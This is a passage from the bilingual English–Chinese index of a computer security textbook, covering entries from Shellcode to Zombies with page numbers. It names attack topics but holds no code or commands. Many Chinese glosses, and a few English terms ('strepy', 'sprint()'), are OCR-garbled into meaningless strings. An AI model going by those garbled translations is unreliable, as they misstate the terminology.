368, 384, 397-400, 586, 595 
Shellcode 
definition (ŒX), 352 
development (JÆ), 352-356 
Shift Rows ( 行 移 位 )，645 
Shift row transformation ( 行 移 位 变换 )，648-650 
Shockwave Rider, The (震荡 波 骑 士 )，210 
Short-lived certificates (短期 的 证 书 )，724 
showlen() function (showlen() 函数 )，368 
shutdown command (shutdown 命令 )，586 
Sidewinder G2 security appliance attack protections 
(响尾蛇 G2 安全 设备 攻击 防护 )，328-329 
Signal-hiding techniques (信号 隐藏 技术 )，734 
Signature (签名 )，723 
Signature-based detection (特征 检测 )，168，287 
Signature or Heuristic detection( 特 征 或 启发 式 检测 ), 


275, 277-278 
Signed data (签名 数据 )，694 
Simple hash functions, SHF (简单 散 列 函数 )， 
670-672 
Simple integrity (简单 完整 性 )，451 
Simple Mail Transfer Protocol，SMTP (简单 邮件 传 
输 协议 )，312 
Simple security property ( ss-property) (简单 安全 特 
性 )，442，444 
Simple security rule (简单 安全 规则 )，454-455 
Simplicity (简单 性 )，660 
Single bastion inline (JHU ARBAEPL), 321-322 
Single bastion T (独立 AAPL), 322 
Slashdot news aggregation site ( Slashdot HH RAM 
UA, Slashdot 新 闻 聚 合 站 点 )，259 
Slowloris, 254 
Smart cards (AEF), 97, 141 
Smart Card Security User Group (智能 卡 安全 用 户 
4H), 474 
S/MIME (互联 网 安全 多 用 途 邮件 扩展 )，694-695，722 
SMTP (简单 邮件 传输 协议 )，287 
traffic, rule set for (通信 规则 设置 )，309-310 
Smurf DoS program (Smurf 拒绝 服务 攻击 程序 )，258 
Sniffing traffic ( 嗅 探 通信 流量 )，223 
SNMP (简单 网 络 管理 协议 )，287 
Snort，296-300 
architecture (体系 结 构 )，296-297 
characteristics (特点 )，296 
definition (定义 )，296 
destination IP address (目的 地 址 )，298 
destination port (目的 端口 )，298 
direction (方向 )，298 
implementation (实施 )，297 
meta-data rule (元 数据 规则 )，298-299 
non-payload rule( 非 负载 规则 )，298-299 
payload rule (负载 规则 )，298-299 
post-detection rule (检测 后 规则 )，298-299 
protocol (协议 )，298 
rule action (规则 动作 )，297-298 
rules (规则 )，297-300 
source IP address (W IP 地 址 )，298 
source port( 源 端口 )，298 
Snort Inline (Snort 联机 模式 )，326 
SNORT system (SNORT 系统 )，278 


Snowden，Edward (斯 诺 登 ， 爱 德 华 )，269 
SOCKS，314 
Software (软件 )，18，22，177，618 
attack surface (攻击 面 )，31 
behavior-blocking (行为 阻 断 )，233 
bugs (缺陷 )，378 
copyrighted (版 权 )，616 
development life cycle( 开 发 生命 周期 )，380 
efficiency (效率 )，660 
quality (质量 )，377 
reliability (可 靠 性 )，377 
Software as a service (SaaS， 软 件 即 服务 )，182，186 
Software Assurance Forum for Excellence in Code 
(SAFE-Code， 迈 向 卓越 代码 的 软件 保障 论坛 )， 
380 
Software security (软件 安全 ) 
defensive programming and (防御 性 编程 )，7， 
376-380 
issues (问题 )，376-380 
operating systems, interaction of (操作 系统 ， 交 
互 )，396-409 
probability distribution of targeting specific bugs 
(针对 特定 的 错误 的 概率 分 布 )，378 
program input, handling (程序 输入 ， 处 理 )，380-391 
program output, handling (程序 输出 ， 处 理 )， 
409-411 
standard library functions (标准 库 函 数 )，402-405 
systems calls (系统 调用 )，402-405 
writing safe program code (编写 安全 的 程序 代码 )， 
392-396 
Sound recordings, copyrighted (录音 制品 ， 版 权 所 
有 )，616 
Source address spoofing ( 源 地 址 欺骗 )，244-246 
Source and destination transport-level address ( 源 和 
目的 传输 层 地 址 )，309 
Source IP address (W3 IP 地 址 )，309 
Source routing attacks (〈 源 路 由 攻击 )，311 
SPAM e-mail (垃圾 邮件 )，202，218-219 
Spammer programs (垃圾 邮件 发 送 者 程序 )，201 
Spamming (W£), 223 
Spear-phishing attack ( 鱼 叉 式 网 络 钓鱼 攻击 )，225-226 
Special reader (特殊 的 读者 )，91 
Specific account attack (特定 账户 攻击 )，79 
Sponsors (赞助 商 )，480 
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Spoofing (3K 5m), 34, 242, 244-248, 250, 256-257, 
261-262, 307, 311, 733 
sprintf() library routine (sprint() FE BIFEZ), 349 
Spyware (间谍 软件 )，201，224-225 
detection and removal (检测 和 清除 )，234 
payloads (有 效 载荷 )，225 
SQL-based access control (基于 SQL 的 访问 控制 )， 
169-170 
SQL-DOM，168 
SQL injection (SQL 注 人 )，384 
SQL injection ( SQLi) attack ( SQL 注入 攻击 )，163- 
168，385 
attack avenues and types (攻击 途径 和 类 型 )，166-167 
countermeasures (对 策 )，168 
example of (示例 )，164-165 
injection technique (注入 技术 )，165 
SQL Slammer worm (SQL Slammer 蠕虫 )，215 
SSL Record Protocol (SSL 记录 协议 )，701-703 
Stack buffer overflow ( 栈 缓冲 区 溢出 )，342-351 
example (示例 )，344-349，356-359 
vulnerabilities (漏洞 )，349-351 
Stack frame ( 栈 帧 )，343 
Stackguard (E+), 363 
Stack protection mechanisms (堆栈 保护 机 制 )，362-363 
Stackshield, 363 
Stack smashing ( 栈 溢出 )，342 
Standard library functions (标准 库 函 数 )，367，402-405 
Standard of conduct (行为 准则 )，567 
Standard of Good Practice for Information Security 
(ISFOS )( 信 息 安全 良好 实践 标准 )，491，561，624 
Stateful inspection firewall (状态 检测 防火 墙 )，312 
Stateful matching (状态 匹配 )，324 
Stateful protocol analysis (Spa， 状 态 协 议 分 析 )，288 
State-sponsored organizations (国家 资助 的 机 构 )，269 
Statically linked libraries (静态 链接 库 )，595-596 
Statically linked shared libraries (静态 链接 共享 库 )，596 
Static biometric protocol (静态 生物 特征 识别 协议 )，103 
Statistical anomaly (统计 异常 )，324 
Statistical databases (统计 数据 库 )，23 
Statistical Packet Anomaly Detection Engine (SPADE, 
基于 统计 的 异常 检测 引擎 )，287 
Stealthing (隐藏 ， 隐 藏 ) 
backdoor (后 门 )，226-227 
rootkit (后 门 程序 )，227-229 
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Stealth virus〈 隐 蔽 型 病毒 ， 隐 型 病毒 )，208 
strepy() library function (strcpy 库 函 数 )，362，367 
Stream ciphers 〈 流 密码 )，47，651-652 
Strong collision resistant ( 强 抗 碰 擅 )，53 
Structured query language (SQL ， 结 构 化 查询 语言 )， 
162-163, 165 166, 178, 464, 587 
Stuxnet worm (Stuxnet 4), 215-216, 222, 226, 421 
SubBytes transformation (SubBytes 变换 )，648 
Subject attributes (主体 属性 )，134 
Subjects (主题 )，117，146，454，722 
Subscriber (用 户 ， 签 约 用 户 )，74 
Substitute Bytes ( 字 节 替换 )，645 
SubVirt，229 
Summary events (摘要 事件 )，291 
Superuser (超级 用 户 )，125-126 
Supervisory Control and Data Acquisition ( SCADA, 
监控 与 数据 采集 )，497，509-510，512，529-530 
Supporting facilities (配套 设施 ， 辅 助 设施 )，536 
Supportive controls (支持 性 控制 )，518 
Support Vector Machines (SVM， 支 持 向 量 机 )，279 
Symmetric block encryption algorithms (对 称 分 组 加 
密 算 法 ) 
Advanced Encryption Standard (AES， 高 级 加 密 
标准 )，45 
comparison of (比较 )，44 
Data Encryption Standard (DES， 数 据 加 密 标准 )， 
43-44 
practical security issues (实用 安全 问题 )，45-46 
triple DES (三 重 数据 加 密 标准 )，45 
Symmetric encryption 〈( 对 称 加 密 ) 
approaches to attacking (攻击 方法 )，42-43 
cipher block chaining (CBC) mode (密码 分 组 链 
接 模式 ， 密 文 块 链接 模式 )，656-657，671 
cipher block feedback (CFB) mode (密码 分 组 反 
馈 模式 ， 密 文 块 反馈 模式 )，657-659 
counter(CTR)mode (计数 器 模式 )，659-660 
cryptanalysis (密码 分 析 ), 42-43, 45, 54-55, 
639-641 
Data Encryption Algorithm ( DEA， 数 据 加 密 算 
法 )，43，643 
Data Encryption Standard (DES， 数 据 加 密 标准 )， 
41, 82, 643, 717 
electronic codebook (ECB) mode (电子 密码 本 
Mit), 45, 48, 655-656 


Feistel cipher structure (Feistel 密码 结构 )，641-643 
historical evidence (历史 证 据 )，41 
ingredients of (成 分 ， 组 成 部 分 )，42 
key distribution ( 密 钥 分 发 )，662-664 
message confidentiality and (消息 机 密 性 )，637-664 
message/data authentication using (信息 /数据 认 
证 )，48 
modes of operation (操作 模式 )，655-660 
RC4 algorithm (RC4 算法 )，653-655 
requirements for secure use of (安全 使 用 的 要 求 )，42 
secret key〈 密 钥 ， 秘 密 密 铀 )，42 
simplified model (简化 模型 )，42 
stream ciphers〈 流 加 密 )，47，651-652 
triple DES (3DES) (三 重 数 据 加 密 标 准 )，45， 
109，643-645 
types of (类 型 )，46 
Symmetric encryption devices, location of (对 称 加 
BRE, ME), 660-662 
Symmetric stream encryption algorithms (对 称 流 加 
密 算法 )，41 
SYN Cookies, 262 
SYN-FIN attack (SYN-FIN 攻击 )，299 
SYN flood (SYN 洪 泛 )，250-251 
SYN spoofing attack (SYN 欺骗 攻击 )，246-248，261 
syslog(), 591 
syslogd, 592 
Syslog protocol (Syslog Hi), 591-593 
System Access Control List ( SACL， 系 统 访问 控制 
列表 )，591 
System architecture (系统 架构 )，477 
System calls (系统 调用 )，323 
traces (轨迹 ， 踪 迹 )，278 
system ( “command.exe ” ) function ( system 
( “command.exe” ) AML), 352 
System corruption (Att), 200, 221-222 
data destruction (数据 破坏 )，221-222 
logic bomb (逻辑 炸弹 )，222 
nature of (本 质 )，221 
real-world damage (现实 世界 的 损害 )，222 
System events (系统 事件 )，591 
system() function (system() 函数 )，367 
System integrity (系统 完整 性 )，13 ，477 
verification tools (验证 工具 )，570 
System-level auditing data (系统 级 审计 数据 )，594 





System-level audit trails (系统 级 审计 迹 )，588-593 

System maintainers (系统 维护 人 员 )，562 

System Management Mode ( SMM ， 系 统管 理 模式 )， 
229 

System registry settings〈 系 统 注册 表 设 置 )，323 

System resources (系统 资源 )，17-18 

modification of (更 改 )，322 

System resources ( assets) (系统 资源 (资产 ))，17-18， 
21-25, 498-499 

System routine (系统 例 程 )，124 

System’s access control protections (系统 访问 控制 
RH), 20 

Systems and services acquisition (系统 和 服务 获取 )，27 

Systems calls，software security (系统 调用 ， 软 件 
安全 )，402-405 

System testing (系统 测试 )，477 

T 

Target of evaluation (TOE， 评 价 对 象 )，471 

Tautology ( 重 言 式 )，166-167 

TCP, 50, 242, 246-249, 255-256, 261-262, 287- 
289, 296, 298-299, 302, 309-314, 317, 324, 
326, 392-393, 584, 592, 701, 703, 706-708, 
710-711 

Transmission Control Protocol/Internet Protocol (TCP/ 
IP), 16, 109, 242, 245, 249, 258, 262, 
311, 393, 593, 603 

TCP SYN flood (TCP SYN #22), 250 

TCP SYN spoofing attack (TCP SYN 欺骗 攻击 )，247 

TCP wrappers library (TCP 封装 库 )，429 

Technical security controls (技术 安全 管控 )，518 

Technical threats (技术 威胁 )，542-543 

prevention and mitigation measures (预防 和 缓解 
措施 )，545 

Technology controls (技术 控制 )，520 

Telnet (远程 登录 )，287，312 

tempnam() function (tempnam() 函数 )，407 

Temporal Key Integrity Protocol (TKIP, fi HY 8744 
完整 性 协议 )，750，758 

Temporal Key (TK， 临 时 密 钥 )，756 

Temporary files, safe use of (临时 文件 ， 安 全 使 用 )， 
407-408 

Termination process (终止 进程 )，565 

Testing (W 试 )，31，36，83，99，244，297，325， 
352, 377-379, 381, 390-391, 394, 405, 423, 
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430, 432, 476-480, 528, 545, 618, 628 
Theft (i), 543 
Theft of the token (窃取 token), 105 
Third-generation programs (第 三 代 程 序 )，232 
Threat agent (威胁 方 ， 威 胁 代理 )，17，19 
Threats (威胁 )，17-19，203，474，499， 参 见 Attacks 
assets of a computer system and (计算 机 系统 资 
产 )，21-25 
attacks and (Wii), 19-21 
electrical power (#477), 542 
electromagnetic interference (EMI, HARE Ft), 543 
human-caused (人 为 造成 的 )，543 
to mobile devices (移动 设备 )，736-737 
physical security (物理 安全 )，536-543 
to wireless networks (无 线 网 络 )，733-734 
Threat source (威胁 源 )，500 
Thresholding (BY{H), 603-604 
Ticket-granting service (TGS ， 票 据 授予 服务 )，718 
Ticket-granting ticket(TGT， 票 据 授予 票据 )，718-719 
Tiny fragment attacks (微小 片段 攻击 )，311 
TKIP Sequence counter (TSC, TKIP 序列 计数 器 )，758 
Token protocol ( 令 牌 协议 )，102 
Tokens ( 令 牌 )，118 
automatic teller machine (ATM， 自 动 取款 机 )，91 
electronic identity (elD ) card (电子 身份 卡 )，93-96 
loss (Æ%), 91 
memory cards (FF), 90-91 
personal identification number ( PIN， 个 人 识别 
#5), 91, 95 
smart cards (智能 卡 )，91-93 
Tornado (HBX), 537 
TPM functions (TPM 功能 )，468 
Trademark (商标 )，617 
Traffic analysis (流量 分 析 )，24 
Traffic anomaly (流量 异常 )，324 
Traffic security (通信 安全 )，739 
Training (训练 )，26 
Transfer-only right (只 转 权 ， 只 有 转让 权 )，123 
Transformation procedures (TP， 转 化 过 程 )，452 
Transport Layer/Secure Socket Layer Security (传输 
层 /安全套 接 字 层 安全 )，408 
Transport layer security (TLS， 传 输 层 安全 )，62， 
676，700 
Trapdoor (lJ), 42 Backdoor (trapdoor) 
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Triage (分 流 ， 分 类 )，569 
Tribe Flood Network (TFN， 部 落 式 洪 泛 网 络 ， 族 
群 式 洪 泛 网 络 )，251 
Tribe Flood Network 2000 ( TFN2K， 部 落 式 洪 泛 网 
络 2000), 251 
Triggering phase of virus (病毒 的 触发 阶段 )，205 
Triple DES ( 3DES， 三 重 数据 加 密 标准 )，45，109， 
643-645 
attractions (吸引 )，45 
principal drawback (主要 缺点 )，45 
Trivial File Transfer Protocol (TFTP， 人 简单 文件 传输 
协议 )，287 
Trojan horse (特洛伊 木马 )，21，201，219-220 
models (模型 )，220 
Trojan horse attack (木马 攻击 )，21，104-105，201 ， 
215, 217, 227, 268, 322, 452 
defenses (PJH), 458-459 
Trojan horse programs (7 #2), 218-220, 458-459 
Trojan horse sniffers (木马 嗅 探 器 )，315 
Trojans (木马 )，202 
mobile phone (手机 )，220-221 
Tropical cyclones (热带 气旋 )，537 
True random number generator (TRNG， 真 随机 数 发 
生 器 )，65-66 
Trust (faf£), 15, 114, 136, 139, 141, 188, 191, 
225, 421, 452, 456, 467, 491, 564, 699, 
716, 720, 725-726 
Trusted computer system〔 可 信 计 算 机 系统 )，456 
Trusted Computer System Evaluation Criteria 
(TCSEC， 可 信 计 算 机 系统 评价 准则 )，470 
Trusted computing (TC， 可 信 计 算 )，456，466 
authenticated boot service( 认 证 引导 服务 )，466- 
467 
certification service (认证 服务 )，467 
encryption service (加 密 服务 )，467-468 
platform module (TPM， 平 台 模 型 )，468-469 
protected storage ( 受 保护 的 存储 )，469-470 
reference monitors (基准 监视 器 )，457-458 
Trojan horse defenses (木马 防御 )，458-4S9 
Trusted computing base(TCB, ， 可 信 计 算 基 )，456 
Trusted computing and platform module (可 信 计 算 与 
平台 模块 ) 
authenticated boot service (认证 引导 服务 )，466-467 
certification service (认证 服务 )，467 


encryption service (加 密 服务 )，467-468 
protected storage( 受 保护 的 存储 )，469-470 
TPM functions (TPM 功能 )，468-469 
Trusted distribution 〈 可 信任 分 布 )，478 
Trusted platform module(TPM， 可 信 平 台 模块 )，466 
Trusted recovery (可 信 恢 复 )，478 
Trusted systems (可 信 系 统 )，456 
reference monitors (基准 监视 器 )，457-458 
terminologies (术语 )，456 
Trojan horse defense (木马 防御 )，458-459 
Trust framework providers (信任 框架 提供 商 )， 
146-147 
Trust frameworks (信任 框 架 )，143-147 
open identity (公开 身份 )，145-147 
traditional approach (传统 方法 )，143-145 
Trustwave 2013 Global Security Report ( Trustwave 
2013 年 全 球 安全 报告 )，163 
Trustworthiness (可 信和 度 )，456 
Trustworthy system (可 信赖 的 系统 ， 可 靠 的 系统 )， 
458 
Tuples (7028), 159, 462 
U 
Ubuntu Linux systems (Ubuntu Linux #4), 279-280 
UDP, 249, 251, 255-258, 261, 287-288, 296, 298, 
309, 314, 317, 324, 326, 328, 708, 711 
UDP flood attack (UDP 洪 泛 攻击 )，249 
Unauthorized (AFZALH), 13, 19-24, 27, 30, 35, 
76, 79, 86, 91, 114, 156, 173, 188-189, 
217, 226, 268, 270, 274-275, 278, 286-287, 
293, 307, 312, 316, 319, 376, 431, 442, 
451, 457, 464, 478, 509-511, 536, 543, 
546, 563, 567-568, 571, 584, 587, 618-619, 
623, 626, 628, 709, 717, 734-735, 739 
Unauthorized disclosure (未 经 授权 披露 )，19 
Unauthorized physical access (未 经 授权 的 物理 访 
问 )，543 
Unavailability of system (系统 不 可 用 )，18 
Unconstrained data items(UD1， 无 约束 数据 项 )，452 
Undervoltage condition (电压 不 足 状 态 ， 低 电压 状 
态 )，542 
Unicode，389 
Unified threat management (UTM) system〔 统 一 威胁 
管理 系统 )，326-330 
Appliance architecture (设备 体系 结构 )，327 


UNIX file access control ( UNIX 文件 访问 控制 )， 
124-127 
access control lists (访问 控制 列表 )，127 
directory, structure of (目录 ， 结 构 )，124 
“effective group ID”( 有 效 的 用 户 组 ID )，125 
“effective user ID ”( 有 效 的 用 户 ID)，125 
FreeBSD，127 
protection bits (保护 位 )，125 
“real group ID” (真实 的 用 户 组 ID)，125 
“real user ID (真实 的 用 户 ID)，125 
setfacl command (setfacl 命令 )，127 
“set group ID”( SetGID ) permission (设置 组 ID 
权限 )，125 
“set user ID” ( SetUID) permission (设置 用 户 ID 
权限 )，125 
traditional (传统 的 )，125 
user identification number(userID， 用 户 ID), 125 
UNIX operating system (UNIX 操作 系统 )，342 
UNIX password scheme (UNIX 口令 方案 )，80-82 
Implementation of (SEHR), 82-83 
Unknown risk profile (未 知 风险 场景 )，188 
Unlinkability (不 可 链接 的 )，624 
Unobservability (不 可 观测 性 )，624 
U.S. Digital Millennium Copyright Act ( DMCA, % 
国 数字 千年 版 权 法 )，618-619 
User (用 户 )，130，177-178 
User authentication (用 户 认证 ) 
biometric-based (基于 生物 特征 )，96-101 
case study of (案例 学 习 )，107-110 
electronic (电子 的 )，74-78 
means of (方法 )，75 
password-based (基于 口令 的 )，78-90 
potential attacks ( 洪 在 的 攻击 )，103-105 
remote (远程 )，101-103 
risk assessment for (风险 评估 )，75-78 
security issues (安全 问题 )，103-105 
token-based (基于 令 牌 的 )，90-96 
User credential compromise (用户 证 书 泄漏 )，34 
User credential guessing (用 户 凭证 猜测 )，34 
User-defined roles (用 户 自 定义 的 角色 )，172-173 
User dissatisfaction (用 户 不 满 )，91 
User education strategy (用 户 教 育 策略 )，88 
User identification number (user ID ， 用 户 ID )，125 
User input (用 户 输入 )，166 
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User interface (UI， 用 户 界面 ) 
to an IDS (对 IDS)，273 
redress attack (伪装 攻击 )，218 
User-level auditing data (用户 级 审计 数据 )，594 
User-level audit trails (用 户 级 审计 迹 )，588，594-595 
User mistakes (用 户 错误 )，79 
User mode (用 户 模 式 )，124 
Users administration (用 户 管理 )，431 
User-supplied password (用 户 提供 的 口令 )，81 
User terminal and user(UTU， 用 户 终端 和 用 户 )，33 
Usurpation (47F), 21 
UTF-8 encoding (UTF-8 编码 )，389 
Utility patents (实用 专利 )，617 
V 
Vandalism (故意 破坏 的 行为 )，543 
Veracode 2013 State of Software Security Report 
(Veracode 2013 年 度 软 件 安全 状况 报告 )，163 
Verifiability (可 验证 性 )，457 
Verification (验证 )，$3$，61，73，98，103，142， 
146, 452, 458, 477-478, 548-550, 570, 717 
step ($), 73 
Verifier (验证 者 )，75 
View, relational databases (视图 ， 关 系数 据 库 )，162 
Virtualization security (虚拟 化 安全 )，432-436 
Hosted virtualized systems (宿主 虚拟 化 系统 )，436 
hypervisor security (虚拟 化 层 安 全 性 )，435-436 
issues (问题 )，434-435 
virtualized infrastructure security (虚拟 化 基础 设 
施 安 全 )，436 
Virtualized infrastructure security (虚拟 化 基础 设施 
安全 )，436 
Virtualized rootkits (虚拟 化 的 rootkit)，229 
Virtual machine monitor (VMM， 虚 拟 机 监视 器 )，433 
Virtual memory (虚拟 内 存 )，449 
Virtual private networks (VPN， 虚 拟 专 用 网 )，319，739 
Viruses (病毒 )，22，201 
in Adobe’s PDF documents ( Adobe 中 的 PDF X 
#4), 210 
boot sector infector (引导 扇 区 感染 程序 )，208 
classification by concealment strategy ( 按 隐藏 策略 
分 类 )，208-209 
classification by target ( 按 目 标 分 类 ， 依 目标 分 
类 )，208 
compression (压缩 )，207 
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encrypted (加 密 的 )，208 
file infector (文件 感染 型 病毒 )，208 
infection mechanism (感染 机 制 )，205 
logic, example (i248, Si), 206 
macro (#), 206, 209-210 
metamorphic (变形 的 )，209 
multipartite (多 方 的 )，208 
nature of (本 质 )，204-208 
phases of growth《【 成 长 的 阶段 )，205-206 
polymorphic (多 态 的 )，208-209 
real-world damage (现实 世界 的 损害 )，222 
scripting (脚本 )，209-210 
Stealth (FARK), 208 
trigger mechanism (触发 机 制 )，205 
Virus signature scanner (病毒 特征 码 扫描 )，232 
Visual identity verification (视觉 身份 认证 )，551 
Voice over IP ( VoIP) telephony ( IP 语音 ( VoIP) 电 
wi), 252 
Volatile memory ( 易 失 性 存储 器 )，469 
VT100，409 
Vulnerabilities (脆弱 性 ， 漏 洞 )，341，344，357， 
368, 499, 569, JL Viruses; Worms 
identification (W31), 500-501 
of passwords (口令 )，78-80 
PHP file inclusion (PHP 文件 包含 )，386 
PHP remote code injection ( PHP 远程 代码 注入 )， 
386 
shell scripts (shell 脚本 )，398 
of software (软件 )，202 
in stack buffer overflow (堆栈 缓冲 区 滋 出 )，349-351 
of system (系统 )，17-18，32 
XSS reflection (XSS 反射 )，387 
W 
4-way handshake (四 次 握手 )，756 
Warezov family of worms (Warezov ZIKIR HA), 215 
War Games (战争 游戏 )，226 
Watering-hole attacks (水 坑 式 攻击 )，217 
Weak collision resistant ( 弱 抗 碰撞 )，53 
Web-based e-commerce sites (基于 Web 的 电子 商务 
网 站 )，78 
Web CGI injection attack (Web CGI 注入 攻击 )，382-383 
Web clients (Web 客户 端 )，215 
Web security (Web #4), 190 
Web servers (Web 服务 器 )，215 


Web server software (Web 服务 器 软件 )，31 
Well-formed transactions ( 良 形 事务 )，452 
WHERE clause (WHERE 子 句 )，167 
Wide area network (WAN, ， 广 域 网 )，285，305， 
317，319， 参 见 IEEE 802.11 Wireless LAN; 
IEEE 802.11i Wireless LAN 
Wi-Fi, 546, 732-733, 737 
Wi-Fi5, 740 
Wi-Fi Alliance (Wi-Fi K% ), 740, 746 
Wi-Fi Protected Access (WPA, Wi-Fi 网 络 安全 接 
A), 746 
Windowing (#14), 604 
Windows, 83, 109, 157, 183, 214-216, 221, 
229, 243, 251, 262, 278-281, 306, 314, 
316, 352, 360-361, 363-364, 382, 389, 
391, 397, 400, 423, 440, 606, 735 
Windows Event Log (Windows $F H a), 589-591 
Windows security (Windows 安全 ) 
access controls (访问 控制 )，431 
application and service configuration (应 用 和 服务 
配置 )，431-432 
firewall and malware countermeasure capabilities 
(防火 墙 和 恶意 软件 的 对 抗 能 力 )，432 
patch management (补丁 管理 )，430 
Security Account Manager (SAM， 安 全 账户 管 
理 )，431 
Security ID (SID ， 安 全 标识 )，431 
testing (测试 )，432 
User Account Control (UAC， 用 户 账户 控制 )，431 
users administration (用 户 管理 )，431 
Windows shares (Windows 共享 )，214-215 
Wired Equivalent Privacy ( WEP， 有 线 等 效 隐私 )， 
653, 655, 746, 750, 755, 758 
Wireless access point(AP， 无 线 接 人 点 )，284 
Wireless IDS (WIDS， 无 线 人 侵 检测 )，284 
Wireless LAN (无 线 局 域 网 )，653，655， 参 见 IEEE 
802.11 Wireless LAN; IEEE 802.11i Wireless LAN 
Wireless networks (无 线 网 络 ) 
security measures (安全 措施 )，734-735 
security risk of (安全 风险 )，732-733 
threats to (SUH), 733-734 
Wireless network sensor (无 线 网 络 传感器 )，284 
Workstation hijacking (工作 站 支持 )，79 
World (世界 ), 117 


World Intellectual Property Organization ( WIPO ) 
treaties (世界 知识 产权 组 织 条 约 )，618 
Worms (W), 201, 288 

clickjacking (点 击 劫持 )，218 


client-side vulnerabilities and drive-by-downloads 


(客户 端 漏洞 和 夹带 式 下 载 )，217-218 

Code Red (红色 代码 )，214-215 

CommWarrior (CommWarrior 病毒 )，217 

Conficker (or Downadup)(Conficker (或 Downadup) 
蠕虫 )，215 

cyber-espionage (网 络 间谍 )，216 

Duqu (Duqu 蠕虫 )，216 

history of attacks (攻击 的 历史 )，214-216 

means to access remote systems (访问 远程 系统 的 
方法 )，210-211 

Melissa e-mail worm (Melissa 电子 邮件 蠕虫 )，214 

metamorphic (变形 的 )，216 

mobile phone (手机 )，217 

Morris worm (Morris RE), 213 

multi-exploit (多 种 攻击 手段 )，216 

multiplatform (多 平台 )，216 

Mydoom (Mydoom 4&2), 215 

polymorphic technique of spreading (传播 的 多 态 
HR), 216 

propagation model (传播 模型 )，212-213 

real-world damage (现实 世界 的 破坏 )，222 
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SQL Slammer (SQL Slammer 蠕虫 )，215 
state of the art technology in (先进 的 技术 )，216 
Stuxnet ( 震 网 病毒 )，215-216，421 
target discovery (目标 发 现 )，210-211 
transport vehicles of (运输 工具 )，216 
ultrafast spreading( 超 快速 传播 )，216 
Warezov family of (Warezov 家 族 )，215 
zero-day exploit ( 零 日 漏洞 )，216 
Zou’s model (Zou 模型 )，213 
Wrapper program (包装 程序 )，399 
Write access ( 写 访问 )，117，465 
Writing assignments (写作 作业 )，768-769 
Writing safe program code (编写 安全 的 程序 代码 )， 
392-396 
X 
X.509 certificates (X.509 证 书 )，62 
X.509 ITU-T standard (X.509 ITU-T 标准 )，722-725 
XSS attacks (XSS Wii), 387-388, 409-410 
XSS reflection vulnerability (XSS 反射 漏洞 )，387 
Z 
Zero-day attacks (AW), 275, 280-281 
Zero-day exploit ( 零 日 漏洞 利用 )，216 
Zeus banking Trojan (Zeus 网 银 木马 )，225 


` Zeus crimeware toolkit (Zeus 犯罪 软件 工具 包 )，202 


Zombies (僵尸 )，201-202，220-222,，250-251，258， 
262 


